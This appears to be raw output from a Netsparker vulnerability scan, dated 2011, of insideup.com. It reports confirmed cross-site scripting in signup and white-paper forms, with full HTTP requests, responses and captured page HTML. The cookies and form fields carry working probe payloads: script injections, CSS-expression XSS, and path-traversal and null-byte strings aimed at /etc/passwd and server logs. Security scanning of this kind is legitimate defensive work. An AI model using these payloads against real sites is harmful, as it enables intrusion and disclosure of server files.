src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST '"--></style></script><script>alert(0x0004C8)</script>
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 304
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004C8)%3c%2fscript%3e&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:40 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=1BDF420E3D5491B24D688935D0B0644A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST '"--></style></script><script>alert(0x0004C7)</script>
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 223
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004C7)%3c%2fscript%3e&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:40 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4F61E89C7F2C938D4743E3E1673F72B2; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x0004D5)</script>
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 